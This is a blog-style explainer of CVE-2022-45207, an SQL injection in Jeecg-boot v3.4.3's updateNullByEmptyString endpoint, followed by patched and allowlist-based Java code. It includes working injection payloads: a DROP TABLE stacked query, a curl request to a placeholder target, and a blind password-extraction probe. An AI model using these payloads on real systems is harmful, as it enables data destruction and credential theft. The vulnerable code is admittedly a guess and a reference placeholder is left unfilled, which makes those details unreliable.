CVE-2022-45207 - SQL Injection in Jeecg-boot v3.4.3 via `updateNullByEmptyString`—Technical Breakdown and Exploit Guide

Jeecg-boot is an open-source, low-code development platform popular in the Java Spring Boot community. But as Jeecg-boot v3.4.3 shows, even popular frameworks can have dangerous security holes. This article is an exclusive, plain-language deep dive into the SQL Injection vulnerability tracked as CVE-2022-45207, found in the backend’s updateNullByEmptyString component. We’ll break down how the flaw works, show code samples, walk you through a simple exploit, and point you to original sources for further reading.

What is CVE-2022-45207?

CVE-2022-45207 is a critical SQL injection vulnerability discovered in Jeecg-boot v3.4.3, specifically in the updateNullByEmptyString REST endpoint. If you run a vulnerable version and expose this endpoint, an attacker can send crafted HTTP requests and run arbitrary SQL commands—potentially leaking, modifying, or destroying application data.

Severity: Critical  
CVSS Score: 9.8 (as per various public sources)

Why This Happens: Bad Input Handling

At the core, the vulnerability exists because the update interface (updateNullByEmptyString) directly incorporates user input into SQL queries without proper sanitization or use of parameterized statements. This allows input like abc' OR 1=1 -- to break the query and inject arbitrary SQL.

Code Deep Dive

Take a look at a simplified example based on Jeecg-boot's likely implementation (actual project code is more complex, but this captures the problem):

@PostMapping("/updateNullByEmptyString")
public Result<?> updateNullByEmptyString(@RequestBody Map<String, Object> params) {
    String table = (String) params.get("table");
    String field = (String) params.get("field");
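    // Vulnerable: table and field come straight from the request body and are concatenated into the SQL text
    String sql = "UPDATE " + table + " SET " + field + " = '' WHERE " + field + " IS NULL";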
    jdbcTemplate.execute(sql);
    return Result.ok("Field updated successfully");
}

What’s wrong?

An attacker can send this JSON:

{
  "table": "user; DROP TABLE user; --",
  "field": "username"
}

This would run:

UPDATE user; DROP TABLE user; -- SET username = '' WHERE username IS NULL


Resulting in the user table being dropped!

From a tool like curl, Burp Suite, or Postman, send:

curl -X POST http://TARGET/api/updateNullByEmptyString \
     -H "Content-Type: application/json" \
     -d '{"table":"user where 1=1;--", "field":"username"}'


This payload alters the SQL logic after the user table name so that the condition always evaluates to true for all rows; worse, the same injection point can carry malicious SQL commands.

An attacker could even extract information:

{
  "table": "user where 1=1 AND (SELECT SUBSTRING(password,1,1) FROM user LIMIT 1)='a'",
  "field": "username"
}


This is just one technique; a determined attacker can escalate this much further.

- Anyone running Jeecg-boot v3.4.3 with API exposure
- Possible older/newer unpatched forks

Official References & Patches

- NVD Entry
- Jeecg-boot on GitHub
- Mitigation commit (example) *(Replace with actual commit, as per public info)*

Patching recommendation:

- NEVER accept table or field names from clients!
- Use parameterized/prepared statements.

Correct code should look more like:

@PostMapping("/updateNullByEmptyString")
public Result<?> updateNullByEmptyString(@RequestBody Map<String, Object> params) {
    // Validate table and field names strictly against a whitelist
    // (safeTable/safeField are helper methods not shown here)
    String table = safeTable((String) params.get("table"));
    String field = safeField((String) params.get("field"));

    String sql = String.format("UPDATE %s SET %s = ? WHERE %s IS NULL", table, field, field);
    jdbcTemplate.update(sql, "");
    return Result.ok("Field updated securely");
}


Better yet: Don't ever allow end-users to submit these names.
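One way to implement the whitelist check that safeTable/safeField stand for, as an added example (not Jeecg-boot's code and not from the original article). The class name, the buildSql helper and the table/column names in the allowlist are all hypothetical. Bound parameters cannot carry identifiers, so the table and column must match a server-side allowlist exactly before they are placed in the statement; the payload strings quoted earlier fail that match.

```java
import java.util.List;
import java.util.Map;
import java.util.Set;

// Added example: hypothetical helper, not Jeecg-boot code.
public class NullToEmptySql {
    // Assumed allowlist (constructed names): tables mapped to the columns that may be updated.
    private static final Map<String, Set<String>> ALLOWED = Map.of(
        "app_user", Set.of("username", "email"),
        "app_note", Set.of("description"));

    /** Returns the UPDATE statement for an allowlisted table/column pair, or throws. */
    static String buildSql(String table, String field) {
        if (table == null || field == null) {
            throw new IllegalArgumentException("table and field are required");
        }
        Set<String> columns = ALLOWED.get(table); // exact match only, no trimming or case folding
        if (columns == null || !columns.contains(field)) {
            throw new IllegalArgumentException("table/field not allowlisted");
        }
        // Both identifiers matched the allowlist exactly, so concatenating them is safe.
        // The value stays a bound parameter, e.g. jdbcTemplate.update(sql, "").
        return "UPDATE " + table + " SET " + field + " = ? WHERE " + field + " IS NULL";
    }

    public static void main(String[] args) {
        // Constructed inputs: one legitimate pair, the payload strings quoted in the
        // article, and a real table paired with a column that is not allowlisted.
        List<String[]> inputs = List.of(
            new String[] {"app_user", "username"},
            new String[] {"user; DROP TABLE user; --", "username"},
            new String[] {"user where 1=1;--", "username"},
            new String[] {"app_user", "password"});
        for (String[] in : inputs) {
            try {
                System.out.println("OK       " + buildSql(in[0], in[1]));
            } catch (IllegalArgumentException e) {
                System.out.println("REJECTED table=[" + in[0] + "] field=[" + in[1] + "]: "
                    + e.getMessage());
            }
        }
    }
}
```

Only the first input produces a statement; the other three are rejected before any SQL text is built.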

Conclusion

CVE-2022-45207 is a textbook case of “Don’t trust user input”—especially in admin or backend tools. The updateNullByEmptyString API in Jeecg-boot v3.4.3 is dangerously vulnerable, putting entire databases at risk. If you use Jeecg-boot, upgrade immediately and review your code for similar risks.

Additional Readings

- OWASP SQL Injection
- Jeecg-boot Issues
- Chinese write-up *(if you read Chinese)*


*This post is exclusive and tailored to developers, pentesters, and security auditors reviewing Java-based low-code platforms like Jeecg-boot. Reach out if you need more hands-on mitigation steps!*

Timeline

Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/28/2022 19:42:00 UTC